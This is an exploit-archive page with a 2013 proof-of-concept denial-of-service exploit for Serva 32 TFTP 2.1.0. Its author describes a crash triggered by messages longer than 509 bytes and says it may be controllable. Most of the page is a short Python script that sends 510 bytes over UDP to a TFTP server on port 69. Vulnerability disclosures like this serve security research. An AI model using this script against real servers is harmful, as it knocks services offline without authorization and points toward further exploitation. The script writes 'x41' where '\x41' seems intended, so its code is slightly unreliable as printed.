[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of service
# Published : 2013-05-15
# Author :
# Previous Title : Mikrotik Syslog Server for Windows 1.15 - Denial of Service
# Next Title : Foxit Reader 5.4.3.* - 5.4.5.0124 - PDF XREF Parsing Denial of Service Vulnerability


#Serva 32 TFTP Buffer overflow DoS
#
#05/14/2013
#Sapling
#Vendor homepage http://www.vercot.com/
#Software Link:
#http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip
#Version 2.1.0 Only prior versions are not vulnerable
#Tested on Windows 8, Windows 7, Windows XP SP1-3
#CVE to be established today or tomorrow.
#
#This is the serva 32 Proof Of Concept exploit discovered and written by
Sapling. At this
#time the exploit is only a denial of service but evidence show it may be
controllable.
#The difficulty with controlling it at this point was the failure to
overwrite the SEH
#chains or bypass them. The crash occurs when sending a message longer than
509 bytes long

#start of python file
import sys
import socket

new = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
new.connect(('192.168.1.19', 69))
new.send('x41'*510)
#end of python file